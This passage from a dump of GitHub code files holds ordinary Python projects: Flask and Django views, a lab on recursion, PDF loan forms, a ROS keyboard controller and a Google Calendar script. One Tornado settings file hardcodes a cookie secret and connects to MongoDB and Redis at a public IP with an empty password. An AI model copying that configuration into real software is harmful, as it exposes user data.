strict_slashes=False)\ndef post_category():\n \"\"\"create a new category\"\"\"\n if not request.get_json():\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n if 'label' not in request.get_json():\n return make_response(jsonify({'error': 'Missing label'}), 400)\n category = Category(**request.get_json())\n category.save()\n return make_response(jsonify(category.to_dict()), 201)\n\n\n@app_views.route('/categories/<category_id>', methods=['PUT'],\n strict_slashes=False)\ndef put_category(category_id):\n \"\"\"update a category\"\"\"\n category = storage.get(\"Category\", category_id)\n if category is None:\n abort(404)\n if not request.get_json():\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n for attr, val in request.get_json().items():\n if attr not in ['id', 'created_at', 'updated_at']:\n setattr(category, attr, val)\n category.save()\n 
return jsonify(category.to_dict())\n","repo_name":"medcharfi96/craftiny_v1","sub_path":"api/v1/views/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74264936166","text":"import sweetify\n\nfrom django.conf import settings\nfrom django.db import transaction, DatabaseError\nfrom django.shortcuts import render\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.http import JsonResponse\n\nfrom nolsatu_courses.apps import utils\nfrom nolsatu_courses.apps.courses.models import Enrollment, Batch\nfrom nolsatu_courses.apps.decorators import superuser_required\nfrom django.contrib.auth.decorators import login_required\nfrom nolsatu_courses.apps.utils import call_internal_api\nfrom .forms import FormFilterStudent\nfrom ...apps.accounts.models import MemberNolsatu\n\n\n@superuser_required\ndef index(request):\n graduates = []\n form = FormFilterStudent(request.GET or None)\n if form.is_valid():\n graduates = form.get_data(status=Enrollment.STATUS.graduate)\n\n context = {\n 'menu_active': 'graduate',\n 'title': _('Lulusan'),\n 'graduates': graduates,\n 'form': form\n }\n return render(request, 'backoffice/graduates/index.html', context)\n\n\n@superuser_required\ndef candidate(request):\n candidate = []\n form = FormFilterStudent(request.GET or None)\n if form.is_valid():\n students = form.get_data(status=Enrollment.STATUS.finish)\n candidate = [\n {\n 'enroll': student,\n 'task': student.get_count_task_status()\n } for student in students\n ]\n\n context = {\n 'menu_active': 'graduate',\n 'title': _('Kandidat'),\n 'candidate': candidate,\n 'form': form\n }\n return render(request, 'backoffice/graduates/candidate.html', context)\n\n\n@superuser_required\ndef candidate_to_graduate(request, id):\n enroll = get_object_or_404(Enrollment, id=id)\n enroll.note = request.GET.get('note', \"\")\n enroll.final_score = request.GET.get('final_score', 0)\n enroll.status = Enrollment.STATUS.graduate\n\n msg = ('Selamat, Anda telah berhasil menyelesaikan persyaratan yang diperlukan untuk mendapatkan '\n f'Sertifikasi kelulusan pada kelas {enroll.course.title}. ')\n\n if request.GET.get('print_certificate'):\n data = enroll.get_cert_data()\n response = call_internal_api('post', url=settings.NOLSATU_HOST + '/api/internal/generate-certificate/',\n data=data)\n if response.status_code == 200:\n msg = ('Selamat, Anda telah berhasil menyelesaikan persyaratan yang diperlukan untuk mendapatkan '\n f'Sertifikasi kelulusan pada kelas {enroll.course.title}. '\n 'Silahkan cek sertifikat Anda dimenu Sertifikat pada halaman akun.')\n else:\n sweetify.error(request, f'Gagal cetak sertifikat milik {enroll.user.get_full_name()}', button='OK',\n icon='error')\n\n try:\n with transaction.atomic():\n enroll.save()\n except DatabaseError:\n return redirect('backoffice:graduates:candidate')\n\n utils.send_notification(enroll.user, 'Selamat! 
Anda lulus', msg)\n\n sweetify.success(request, f'Berhasil mengubah status {enroll.user.get_full_name()} menjadi lulusan',\n button='OK', icon='success')\n\n if request.is_ajax():\n data = {\n 'message': _(\"Berhasil set lulus\")\n }\n return JsonResponse(data, status=200)\n\n return redirect('backoffice:graduates:candidate')\n\n\n@superuser_required\ndef regenerate_certificate(request, user_id):\n response = call_internal_api('get', url=settings.NOLSATU_HOST + f'/api/internal/regenerate-certificate/{user_id}')\n if response.status_code == 200:\n sweetify.success(request, 'Berhasil perbarui sertifikat', button='OK', icon='success')\n else:\n sweetify.error(request, 'Gagal perbarui sertifikat', button='OK', icon='error')\n\n return redirect('backoffice:graduates:index')\n\n\n@login_required\ndef ajax_filter_batch(request):\n \"\"\" a view ajax filter used to filtering batch by course\n ...\n Ajax Filter batch by condition user role\n ----------------------------------------\n - backoffice: all batch\n - vendor: batch in course filter by vendor\n - trainer: batch have assigned to teachers\n \"\"\"\n\n course = request.GET.get('course', None)\n\n data = {\n 'batch': []\n }\n\n if course:\n if request.user.nolsatu.role == MemberNolsatu.ROLE.vendor:\n batch = Batch.objects.filter(course=course, course__vendor__user__email=request.user.email)\n elif request.user.nolsatu.role == MemberNolsatu.ROLE.trainer:\n batch = Batch.objects.filter(course=course, teaches__user__email=request.user.email)\n else:\n batch = Batch.objects.filter(course=course)\n\n data['batch'] = [\n {\n 'id': b.id,\n 'batch': b.batch\n } for b in batch\n ]\n\n return JsonResponse(data, status=200)\n","repo_name":"nolsatuid/courses","sub_path":"nolsatu_courses/backoffice/graduates/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7565120561","text":"#\r\n#Name: Nathan Diekema\r\n#Student ID:\r\n#Date: 1/13/18\r\n#\r\n#Lab 2\r\n#Section 202-05\r\n#Purpose of Lab: Recursion vs Iteration\r\n#\r\n\r\n\r\n#This function will return the largest of a list of numbers\r\n#list -> int\r\ndef max_list_iter(int_list): # must use iteration not recursion\r\n \"\"\"finds the max of a list of numbers and returns the value (not the index)\r\n If int_list is empty, returns None. If list is None, raises ValueError\"\"\"\r\n if int_list is None:\r\n raise ValueError\r\n if len(int_list) == 0:\r\n return None\r\n\r\n maxNum = int_list[0]\r\n for x in int_list:\r\n if x > maxNum:\r\n maxNum = x\r\n return maxNum\r\n\r\n#This function will reverse the order of a list\r\n#list -> list\r\ndef reverse_rec(int_list): # must use recursion\r\n \"\"\"recursively reverses a list of numbers and returns the reversed list\r\n If list is None, raises ValueError\"\"\"\r\n if int_list is None:\r\n raise ValueError\r\n\r\n return helper(int_list)\r\n\r\ndef helper(lst):\r\n if len(lst) == 0 or len(lst) == 1:\r\n return lst\r\n return (helper(lst[1:]) + [lst[0]])\r\n\r\n\r\n#This function will use binary search to return the index of a target number\r\n#int int int list -> int\r\ndef bin_search(target, low, high, int_list): # must use recursion\r\n \"\"\"searches for target in int_list[low..high] and returns index if found\r\n If target is not found returns None. If list is None, raises ValueError \"\"\"\r\n \r\n if int_list is None:\r\n raise ValueError\r\n else: \r\n midpoint = ((high+low)//2)\r\n if midpoint == high == low and int_list[midpoint] != target:\r\n return None\r\n #print(\"NOW\", int_list[low], int_list[high], target)\r\n if target == int_list[midpoint]:\r\n return midpoint\r\n elif target > int_list[midpoint]:\r\n return bin_search(target,midpoint+1,high,int_list)\r\n elif target < int_list[midpoint]:\r\n return bin_search(target,low,midpoint-1,int_list)","repo_name":"ndiekema/CPE202","sub_path":"Labs/lab1/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29990945884","text":"import os\n\nfrom django.utils import formats\n\nimport fpdf\nfrom api.models import CheckOutProcess, Item\n\nfrom tinventory.settings import BASE_DIR\n\nTEMP_DIR = \"tmp\"\nFONTS_DIR = \"fonts\"\n\nfpdf.FPDF_FONT_DIR = os.path.join(BASE_DIR, FONTS_DIR)\nfpdf.set_global(\"FPDF_FONT_DIR\", os.path.join(BASE_DIR, FONTS_DIR))\nprint(fpdf.FPDF_FONT_DIR)\nFPDF_FONT_DIR = os.path.join(BASE_DIR, FONTS_DIR)\n\n\nclass Report(fpdf.FPDF):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.add_font(\"Roboto Condensed\", fname=\"RobotoCondensed-Regular.ttf\", uni=True)\n self.add_font(\n \"Roboto Condensed Bold\", fname=\"RobotoCondensed-Bold.ttf\", uni=True\n )\n self.add_font(\n \"Roboto Condensed Light\", fname=\"RobotoCondensed-Light.ttf\", uni=True\n )\n self.add_font(\"mono\", fname=\"RobotoMono-Regular.ttf\", uni=True)\n self.add_font(\"line\", fname=\"Montserrat-Regular.ttf\", uni=True)\n self.add_font(\"code39\", fname=\"code39.ttf\", uni=True)\n self.add_font(\"code39-s\", fname=\"code39_S.ttf\", uni=True)\n\n print(\"RobotoMono-Regular.ttf\")\n\n def heading(self):\n self.normal_font()\n self.image(os.path.join(BASE_DIR, \"logo.png\"), h=20)\n # self.cell(w=0, h=1, ln=1)\n\n def normal_font(self, size=14):\n self.set_font(\"Roboto Condensed\", size=size)\n\n def mono_font(self, size=14):\n self.set_font(\"mono\", size=size)\n\n def small_font(self):\n self.set_font(\"Roboto Condensed Light\", size=9)\n\n def barcode_font(self, size=23):\n self.set_font(\"code39\", size=size)\n\n def barcode_font_small(self, size=15):\n self.set_font(\"code39-s\", size=size)\n\n def normal_color(self):\n self.set_text_color(0, 0, 0)\n\n def dark_grey_color(self):\n self.set_text_color(66, 66, 66)\n\n def save_in_tmp(self, filename):\n filename = os.path.join(BASE_DIR, TEMP_DIR, filename)\n self.output(filename, \"F\")\n return filename\n\n\ndef barcode_pdf(item: Item):\n pdf = Report(orientation=\"P\", unit=\"mm\", format=(54, 17))\n pdf.add_page()\n pdf.set_font(\"Roboto Condensed\", size=6)\n pdf.text(3, 3, \"Eigentum der Technik-AG, Katharineum zu Lübeck\")\n pdf.barcode_font()\n pdf.text(3, 12, txt=\"*{}*\".format(item.barcode))\n pdf.set_font(\"Roboto Condensed\", size=6)\n pdf.set_fill_color(255, 255, 255)\n pdf.rect(0, 13, 54, 4, style=\"F\")\n pdf.text(3, 15, \"ID: {}\".format(item.id))\n\n return pdf.save_in_tmp(\"barcode-{}.pdf\".format(item.id))\n\n\ndef loan_form_pdf(process: CheckOutProcess):\n pdf = Report(orientation=\"P\", unit=\"mm\", format=\"A4\")\n\n for i in range(2):\n pdf.add_page()\n pdf.heading()\n\n pdf.set_font(\"Roboto Condensed\", size=15)\n pdf.dark_grey_color()\n if i == 0:\n txt = \"AUSFERTIGUNG FÜR DIE TECHNIK-AG\"\n x = 120\n else:\n txt = \"AUSFERTIGUNG FÜR DEN AUSLEIHENDEN\"\n x 
= 110\n pdf.text(x=x, y=20, txt=txt)\n\n pdf.set_font(\"Roboto Condensed Bold\", size=20)\n pdf.normal_color()\n pdf.cell(w=0, h=30, txt=\"Ausleihformular der Technik-AG\", align=\"C\", ln=1)\n\n pdf.mono_font()\n pdf.cell(w=55, txt=process.borrowing_person.name)\n\n pdf.normal_font()\n pdf.cell(w=17, txt=\" hat am \")\n\n pdf.mono_font()\n pdf.cell(w=35, txt=formats.date_format(process.checked_out_at, \"d.m.Y\"))\n\n pdf.normal_font()\n pdf.cell(\n w=9,\n txt=\" bei \",\n )\n\n pdf.mono_font()\n pdf.cell(w=55, txt=process.lending_user.get_full_name(), ln=1)\n\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=55, txt=\"Name des Ausleihenden\")\n pdf.cell(w=17)\n pdf.cell(w=35, txt=\"Datum\")\n pdf.cell(w=9)\n pdf.cell(w=55, txt=\"Name des Technik-AG-Mitglieds\", ln=1)\n pdf.cell(w=0, h=8, ln=1)\n\n pdf.normal_font()\n pdf.cell(w=0, txt=\"folgendes ausgeliehen:\", ln=1)\n pdf.cell(w=0, h=8, ln=1)\n\n for check in process.checks.all():\n\n if check.item.preset:\n txt = \"- {} ({}, {})\".format(\n check.item.name, check.item.preset.name, check.item.barcode\n )\n else:\n txt = \"- {} ({})\".format(check.item.name, check.item.barcode)\n pdf.mono_font()\n pdf.cell(w=0, h=8, txt=txt, ln=1)\n\n # pdf.barcode_font_small(size=15)\n # pdf.cell(w=10, h=8, txt=\"*{}*\".format(check.item.barcode), ln=1)\n\n pdf.cell(w=0, h=5, ln=1)\n pdf.normal_font()\n pdf.multi_cell(w=0, h=7, txt=process.condition.text)\n\n if process.check_in_until is not None:\n pdf.cell(w=0, h=2, ln=1)\n pdf.cell(w=60, h=7, txt=\"Vereinbartes Rückgabedatum: \")\n pdf.mono_font()\n pdf.cell(\n w=35,\n h=7,\n txt=formats.date_format(process.check_in_until, \"d.m.Y\"),\n ln=1,\n )\n pdf.cell(w=0, h=20, ln=1)\n\n pdf.set_font(\"line\", size=12)\n pdf.cell(w=50, txt=\"________________________________\")\n pdf.cell(w=65)\n pdf.cell(w=50, txt=\"________________________________\", ln=1)\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=50, txt=\"Unterschrift des Ausleihenden\")\n pdf.cell(w=65)\n pdf.cell(w=30, txt=\"Unterschrift des Technik-AG-Mitglieds\", ln=1)\n\n pdf.text(\n x=10,\n y=285,\n txt=\"Ausleihvorgang {}–{} #{}\".format(\n process.borrowing_person.name, process.checked_out_at, process.id\n ),\n )\n\n pdf.barcode_font(30)\n pdf.text(x=150, y=287, txt=\"*{}*\".format(process.id))\n\n return pdf.save_in_tmp(\"loan-form-{}.pdf\".format(process.id))\n\n\ndef check_in_confirmation_pdf(process):\n pdf = Report(orientation=\"P\", unit=\"mm\", format=\"A4\")\n\n for i in range(2):\n pdf.add_page()\n pdf.heading()\n\n pdf.set_font(\"Roboto Condensed\", size=15)\n pdf.dark_grey_color()\n if i == 0:\n txt = \"AUSFERTIGUNG FÜR DIE TECHNIK-AG\"\n x = 120\n else:\n txt = \"AUSFERTIGUNG FÜR DEN AUSLEIHENDEN\"\n x = 110\n pdf.text(x=x, y=20, txt=txt)\n\n pdf.set_font(\"Roboto Condensed Bold\", size=20)\n pdf.normal_color()\n pdf.cell(w=0, h=30, txt=\"Rückgabebestätigung\", align=\"C\", ln=1)\n\n pdf.mono_font()\n pdf.cell(w=55, txt=process.borrowing_person.name)\n\n pdf.normal_font()\n pdf.cell(w=17, txt=\" hat folgendes zurückgegeben:\")\n\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=55, txt=\"Name des Ausleihenden\")\n\n pdf.cell(w=0, h=8, ln=1)\n\n for check in process.checks.all().filter(checked_in=True):\n pdf.normal_font()\n pdf.cell(w=3, txt=\"-\")\n pdf.mono_font()\n if check.item.preset:\n txt = \"{} ({}, {})\".format(\n check.item.name, check.item.preset.name, check.item.barcode\n )\n else:\n txt = \"{} ({})\".format(check.item.name, check.item.barcode)\n print(len(txt))\n if len(txt) > 30:\n 
pdf.cell(w=0, txt=txt, ln=1)\n pdf.cell(w=0, h=5, ln=1)\n pdf.cell(w=93)\n else:\n pdf.cell(w=90, txt=txt)\n\n pdf.normal_font(10)\n pdf.cell(w=8, txt=\" am \")\n\n pdf.mono_font(12)\n pdf.cell(w=30, txt=formats.date_format(check.checked_in_at, \"d.m.Y\"))\n\n pdf.normal_font(10)\n pdf.cell(\n w=7,\n txt=\" bei \",\n )\n\n pdf.mono_font(12)\n pdf.cell(w=55, txt=check.checked_in_by.get_full_name(), ln=1)\n\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=101)\n\n pdf.cell(w=30, txt=\"Datum\")\n pdf.cell(w=7)\n pdf.cell(w=55, txt=\"Name des Technik-AG-Mitglieds\", ln=1)\n pdf.cell(w=0, h=10, ln=1)\n pdf.cell(w=0, h=20, ln=1)\n\n pdf.set_font(\"line\", size=12)\n pdf.cell(w=50, txt=\"________________________________\")\n pdf.cell(w=65)\n pdf.cell(w=50, txt=\"________________________________\", ln=1)\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=50, txt=\"Unterschrift des Ausleihenden\")\n pdf.cell(w=65)\n pdf.cell(w=50, txt=\"Unterschrift des Technik-AG-Mitglieds\", ln=1)\n\n pdf.text(\n x=10,\n y=285,\n txt=\"Ausleihvorgang {}–{} #{}\".format(\n process.borrowing_person.name, process.checked_out_at, process.id\n ),\n )\n\n pdf.barcode_font(30)\n pdf.text(x=150, y=287, txt=\"*{}*\".format(process.id))\n\n return pdf.save_in_tmp(\"check-in-{}.pdf\".format(process.id))\n\n\ndef excuse_form_pdf(technician, date, start, stop, reason):\n pdf = Report(orientation=\"P\", unit=\"mm\", format=\"A4\")\n\n pdf.add_page()\n pdf.heading()\n\n pdf.set_font(\"Roboto Condensed Bold\", size=20)\n pdf.normal_color()\n pdf.cell(w=0, h=30, txt=\"Entschuldigungsformular der Technik-AG\", align=\"C\", ln=1)\n\n pdf.normal_font()\n pdf.multi_cell(\n w=0,\n h=7,\n txt=\"Der/die Schüler*in {} hat am {} von der {}. Stunde bis zur {}. Stunde folgende Aufgaben für \"\n \"die Technik-AG zu erledigen:\".format(\n technician.name, formats.date_format(date), start, stop\n ),\n )\n\n pdf.cell(w=0, h=3, ln=1)\n\n pdf.mono_font()\n pdf.multi_cell(w=0, h=7, txt=reason)\n\n pdf.cell(w=0, h=3, ln=1)\n\n pdf.normal_font()\n pdf.multi_cell(\n w=0, h=7, txt=\"Deshalb bitte ich darum, sein/ihr Fehlen zu entschuldigen.\"\n )\n\n pdf.cell(w=0, h=20, ln=1)\n pdf.set_font(\"line\", size=12)\n pdf.cell(w=40, txt=\"___________________\")\n pdf.cell(w=30)\n pdf.cell(w=50, txt=\"________________________________\", ln=1)\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=40, txt=\"Datum\")\n pdf.cell(w=30)\n pdf.cell(w=50, txt=\"Belaya/Sievers\", ln=1)\n\n return pdf.save_in_tmp(\"excuse-form-{}-{}.pdf\".format(technician, date))\n","repo_name":"elgohr-update/tinventory","sub_path":"web/api/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":10241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"78829148","text":"#!/usr/bin/env python\nimport rospy\nfrom pynput.keyboard import Key, Listener\nfrom std_msgs.msg import String\nfrom ros_basics.msg import Movement\n\nFRCOMBINATIONS = [\n {Key.up, Key.right}\n \n]\n\nFLCOMBINATIONS = [\n {Key.up,Key.left}\n \n]\n\n\nBRCOMBINATIONS = [\n {Key.down, Key.right}\n \n]\n\nBLCOMBINATIONS = [\n {Key.down, Key.left}\n \n]\n\n\n# The currently active modifiers\ncurrent = set()\n\n# globals\nMessage = \"null\"\ndata = Movement()\n\n# define key press event callback\ndef on_press(key):\n global Message\n if any([key in COMBO for COMBO in FRCOMBINATIONS]):\n current.add(key)\n if any(all(k in current for k in COMBO) for COMBO in FRCOMBINATIONS):\n print(\"forward right\")\n data.forward = True\n 
data.frontRight = True\n data.backRight = False\n if any([key in COMBO for COMBO in FLCOMBINATIONS]):\n current.add(key)\n if any(all(k in current for k in COMBO) for COMBO in FLCOMBINATIONS):\n print(\"forward left\")\n data.forward = True\n data.frontLeft = True\n data.backLeft = False\n if any([key in COMBO for COMBO in BRCOMBINATIONS]):\n current.add(key)\n if any(all(k in current for k in COMBO) for COMBO in BRCOMBINATIONS):\n print(\"backward right\")\n data.backward = True\n data.backRight = True\n data.frontRight = False\n if any([key in COMBO for COMBO in BLCOMBINATIONS]):\n current.add(key)\n if any(all(k in current for k in COMBO) for COMBO in BLCOMBINATIONS):\n print(\"backward left\")\n data.backward = True\n data.backLeft = True\n data.frontLeft = False\n \n if(key==Key.up):\n print(\"forward\")\n data.forward = True\n elif(key==Key.down):\n print(\"backward\")\n data.backward = True\n elif(key==Key.right):\n print(\"Right\")\n data.frontRight = True\n elif(key==Key.left):\n print(\"Left\")\n data.frontLeft = True\n try:\n k = key.char # single-char keys\n except:\n k = key.name # other keys\n Message = k\n\n# define key release event callback\ndef on_release(key):\n global Message\n data.forward = False\n data.backward = False\n data.frontRight = False\n data.frontLeft = False\n data.backRight = False\n data.backLeft = False\n if any([key in COMBO for COMBO in FRCOMBINATIONS]):\n current.remove(key)\n elif any([key in COMBO for COMBO in FLCOMBINATIONS]):\n current.remove(key)\n elif any([key in COMBO for COMBO in BRCOMBINATIONS]):\n current.remove(key)\n elif any([key in COMBO for COMBO in BLCOMBINATIONS]):\n current.remove(key)\n Message = \"null\"\n # stop on PAUSE\n if key == Key.pause:\n print(\"quit on PAUSE\")\n return False\n\n\n# main section\nif __name__ == \"__main__\":\n # setup ros publisher\n pub = rospy.Publisher('Data', Movement, queue_size=10) # name of topic: /ctrl_cmd\n rospy.init_node('COntrol', anonymous=True) # name of node: /keyboard_input\n rate = rospy.Rate(10) # publish messages at 10Hz\n\n # setup keyboard listener\n listener = Listener(on_press=on_press, on_release=on_release, suppress=False)\n listener.start()\n\n # MAIN LOOP\n # endlessly react on keyboard events and send appropriate messages\n while listener.running and not rospy.is_shutdown():\n rospy.loginfo(data)\n pub.publish(data)\n rate.sleep()\n","repo_name":"TejasAnilkumar12/ROS","sub_path":"src/keyboard_controller/scripts/keyboardROS_Sender.py","file_name":"keyboardROS_Sender.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73872888807","text":"def quick_sort(array):\n # first check if the length is at most 1\n if len(array) <= 1:\n return array\n else:\n pivot = array.pop() # Remove the last element and use it as the pivot\n\n # lists for the two partitions\n bigger_list = []\n lower_list = []\n\n for item in array: # Define order, in my case descending\n if item > pivot:\n bigger_list.append(item)\n else:\n lower_list.append(item)\n return quick_sort(bigger_list) + [pivot] + quick_sort(lower_list)\n\n\ndef diffBig2(array):\n bigger = quick_sort(array)\n return bigger[0] - bigger[1]\n\n\nif __name__ == '__main__':\n print(diffBig2([10, 5, 
2]))\n","repo_name":"AlejoCJaimes/Codewars","sub_path":"diff_biggest_two_numbers.py","file_name":"diff_biggest_two_numbers.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74277002087","text":"#!/usr/bin/env python3\n# _*_coding:utf-8_*_\n\n# 设置文件配置\nimport os\n\nimport motor\nimport redis\n\nfrom common.loggerLib import get_logger\n\nsettings = dict(\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n cookie_secret=\"bZJc2sWbQLKosdcdGkHn/VytrsDghDuyhfksdfsSDSsdfJ5/xJ89E=\",\n login_url=\"/login\",\n # xsrf_cookies=True,\n debug=True,\n)\n\n# 日志模块\nlogger = get_logger(strFileName=\"userBase.log\",\n debug=20,\n showStreamLog=True,\n saveLogPath=None)\n\n# 获取数据库连接\ntry:\n g_motor_db = motor.motor_tornado.MotorClient(\"mongodb://112.74.204.250:27017\").userbase\n g_redis_db = redis.StrictRedis(host='112.74.204.250', port=6379, password=\"\", db=0)\nfinally:\n logger.info(\"g_motor_db: %s\" % g_motor_db)\n logger.info(\"g_redis_db: %s\" % g_redis_db)\n\n# 是否把数据写入redis: False 表示不写入redis, True表示写入redis\ng_redis_on = True\n\n# redis 数据保存时间\ng_redis_time_5m = 5 * 60\ng_redis_time_10m = 10 * 60\ng_redis_time_30m = 30 * 60\ng_redis_time_1h = 1 * 60 * 60\n\n# 提示语\ng_msg_token = \"token 错误或过期,请重新获取token, token有效时间为1800s.\"\n\n# 公司列表\ng_company_dict = {\n \"NjLT\": \"南京领添信息技术有限公司\",\n \"SzKS\": \"深圳库尚信息技术有限公司\",\n \"GzLT\": \"广州领添分公司\",\n}\n","repo_name":"xin1195/userbase","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28739743388","text":"from __future__ import print_function\nimport httplib2\nimport os\n\nfrom apiclient import discovery\nimport oauth2client\nfrom oauth2client import client\nfrom oauth2client import tools\n\nimport dateutil.parser\n\nfrom jinja2 import Environment, FileSystemLoader\n\nimport datetime\n\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\n\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/calendar-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/calendar.readonly'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Google Calendar API Python Quickstart'\n\ndef df(value):\n key = \"\"\n key = 'dateTime' if 'dateTime' in value else \"\"\n key = 'date' if key == \"\" and \"date\" in value else key\n if key == \"\":\n print(value)\n return \"\"\n format=\"%I:%M\" if key == 'dateTime' else \"%d %b \" \n \n dv = value[key]\n d = dateutil.parser.parse(dv)\n o = d.strftime(format)\n return o\n\ndef ed(value):\n key = \"\"\n key = 'dateTime' if 'dateTime' in value else \"\"\n key = 'date' if key == \"\" and \"date\" in value else key\n if key == \"\":\n print(value)\n return (\"\", \"\")\n return (key, dateutil.parser.parse(value[key]))\n \n\n \ndef dd(event):\n start = ed(event['start'])\n end = ed(event['end'])\n \n o = \"\"\n if start[0] == \"date\":\n o = start[1].strftime(\"%d %b\")\n \n if start[0] == \"dateTime\":\n o = start[1].strftime(\"%I:%M\")\n\n if end[0] == \"date\":\n o = o + \" - \" + end[1].strftime(\"%d %b\")\n \n if end[0] == \"dateTime\":\n o = o + \" - \" + end[1].strftime(\"%I:%M %d %b\") \n return 
o\n\n\ndef get_credentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'calendar-python-quickstart.json')\n\n store = oauth2client.file.Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\ndef main():\n \"\"\"Shows basic usage of the Google Calendar API.\n\n Creates a Google Calendar API service object and outputs a list of the next\n 10 events on the user's calendar.\n \"\"\"\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('calendar', 'v3', http=http)\n\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\n print('Getting the upcoming 10 events')\n eventsResult = service.events().list(\n calendarId='primary', timeMin=now, maxResults=100, singleEvents=True,\n orderBy='startTime').execute()\n events = eventsResult.get('items', [])\n\t\n default = 'Details Coming Soon'\n if not events:\n print('No upcoming events found.')\n # GET https://www.googleapis.com/calendar/v3/calendars/primary/events/n6arcebcdv2b28ds4u8dr14pis?fields=description&key={YOUR_API_KEY}\n \n j2_env = Environment(loader=FileSystemLoader(THIS_DIR),\n trim_blocks=True)\n j2_env.filters['datetime'] = df\n j2_env.filters['dd'] = dd\n\n \n print(j2_env.get_template('eventsByName.html').render(events=events))\n \n# for event in events:\n \n \n# description = event.get('description', default)\n\n# start = event['start'].get('dateTime', event['start'].get('date'))\n\t\t\n# print (\"Time: %s Event: %s Description: %s\"%(start, event['summary'], description))\n\n\nif __name__ == '__main__':\n main()","repo_name":"lagerrabbit/CalendarStuff","sub_path":"quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2727674776","text":"from ..utils import beta_dist, truncnorm\n\n\ndef iid_spin(dataset, xi_spin, sigma_spin, amax, alpha_chi, beta_chi):\n \"\"\"\n Independently and identically distributed spins.\n \"\"\"\n prior = (\n iid_spin_orientation_gaussian_isotropic(dataset, xi_spin, sigma_spin) *\n iid_spin_magnitude_beta(dataset, amax, alpha_chi, beta_chi))\n return prior\n\n\ndef iid_spin_magnitude_beta(dataset, amax=1, alpha_chi=1, beta_chi=1):\n \"\"\"\n Independently and identically distributed spin magnitudes.\n \"\"\"\n return independent_spin_magnitude_beta(\n dataset, alpha_chi, alpha_chi, beta_chi, beta_chi, amax, amax)\n\n\ndef independent_spin_magnitude_beta(dataset, alpha_chi_1, alpha_chi_2,\n beta_chi_1, beta_chi_2, amax_1, amax_2):\n \"\"\" Independent beta distributions for both spin magnitudes.\n\n https://arxiv.org/abs/1805.06442 Eq. 
(10)\n https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.beta.html\n\n Parameters\n ----------\n dataset: dict\n Dictionary of numpy arrays containing 'a_1' and 'a_2'.\n alpha_chi_1, beta_chi_1: float\n Parameters of Beta distribution for more massive black hole.\n alpha_chi_2, beta_chi_2: float\n Parameters of Beta distribution for less massive black hole.\n amax_1, amax_2: float\n Maximum spin of the more/less massive black hole.\n \"\"\"\n if alpha_chi_1 < 0 or beta_chi_1 < 0 or alpha_chi_2 < 0 or beta_chi_2 < 0:\n return 0\n prior = (beta_dist(dataset['a_1'], alpha_chi_1, beta_chi_1, scale=amax_1) *\n beta_dist(dataset['a_2'], alpha_chi_2, beta_chi_2, scale=amax_2))\n return prior\n\n\ndef iid_spin_orientation_gaussian_isotropic(dataset, xi_spin, sigma_spin):\n \"\"\"\n Independently and identically distributed spin orientations.\n \"\"\"\n return independent_spin_orientation_gaussian_isotropic(\n dataset, xi_spin, sigma_spin, sigma_spin)\n\n\ndef independent_spin_orientation_gaussian_isotropic(\n dataset, xi_spin, sigma_1, sigma_2):\n \"\"\"A mixture model of spin orientations with isotropic and 